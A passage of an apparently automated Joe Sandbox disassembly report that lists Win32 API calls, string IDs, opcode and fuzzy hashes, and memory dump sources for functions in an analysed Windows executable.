                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: c43f09d1ff8ba42666c250caa52250d2705df6940096544d63c6a10cb9886191
                                                • Instruction ID: 7bc78250ead7caf276d3717d9f287cee98ab2434e4544baea4e286cb6d66a052
                                                • Opcode Fuzzy Hash: c43f09d1ff8ba42666c250caa52250d2705df6940096544d63c6a10cb9886191
                                                • Instruction Fuzzy Hash: 7E114F71511108ABEF108F74DC44AFB3B69EF45364F508728FAA5972D0CBB9EC519B60
                                                APIs
                                                • _memset.LIBCMT ref: 007D2D1A
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D2D39
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
                                                • Instruction ID: 85130e8ab5cd5dab39fcce491d9cad65d54f0511378fdc630fcf2d04cf19ed08
                                                • Opcode Fuzzy Hash: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
                                                • Instruction Fuzzy Hash: 4B11E631E01114ABCB20DB58D884B9D77BAAB65300F140163EC15EB3A2D738AD07D7A1
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E2342
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E236B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
                                                • Instruction ID: 8c005c6088132c0ae3efa28c5fe7ed93ed0fd66391ed7ac54eb598f802de64b7
                                                • Opcode Fuzzy Hash: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
                                                • Instruction Fuzzy Hash: D411E0701022A5BADB248F138C84EBBFB6CFF0A355F10812AF94552001D27C6882CAF0
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9135
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 70005128da24dd173765ae4f9a034856af8f1724114839296c80c34d2d99e347
                                                • Instruction ID: dc66e7ecca5271a7cd5aa8c9c1c2a3bb9b705eee2643869215b5b6d8240b0fc1
                                                • Opcode Fuzzy Hash: 70005128da24dd173765ae4f9a034856af8f1724114839296c80c34d2d99e347
                                                • Instruction Fuzzy Hash: 0901D231A05219EBCF04AB64CC9ADFE7769EF06360B14465DF836572C1EA3D5908C650
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 007C902D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 5e1d4bd202b82500a7a7ec9227dc4ab0c5a4798ec31956f6a93285c93b4abf63
                                                • Instruction ID: bf5a624f1fe0877327fc281d08b57832d3615e57b13f7e826af19190f8349aa6
                                                • Opcode Fuzzy Hash: 5e1d4bd202b82500a7a7ec9227dc4ab0c5a4798ec31956f6a93285c93b4abf63
                                                • Instruction Fuzzy Hash: 9201F771A41109EBCF14E7A0CD9BEFE77A8EF05340F24412DB916A3281DE2D5E08D2B1
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 007C90B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 50c46f28db0b4735b65e7eb21b09cf17cbd20bc4cf9882683b03f32e0796e049
                                                • Instruction ID: 5ef472e5859bf9ede4f3c0ad755a798f3718cd78088f57bde152658e9cdf7139
                                                • Opcode Fuzzy Hash: 50c46f28db0b4735b65e7eb21b09cf17cbd20bc4cf9882683b03f32e0796e049
                                                • Instruction Fuzzy Hash: 6C01F271A41109ABCF04E7A4C98AFFE77A8DF04340F24412DB916A3282DE2D5E09D2B6
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                APIs
                                                  • Part of subcall function 007AB494: _memset.LIBCMT ref: 007AB4A1
                                                  • Part of subcall function 00790AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB470,?,?,?,0077100A), ref: 00790AC5
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB474
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB483
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB47E
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 007B1ACE
                                                  • Part of subcall function 007EC104: LoadLibraryA.KERNEL32(kernel32.dll,?,007B1CB7,?), ref: 007EC112
                                                  • Part of subcall function 007EC104: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC124
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B1CC6
                                                Strings
                                                Similarity
                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                • String ID: WIN_XPe
                                                • API String ID: 582185067-3257408948
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F59D7
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007F59EA
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Strings
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F5A17
                                                • PostMessageW.USER32(00000000), ref: 007F5A1E
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Strings
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461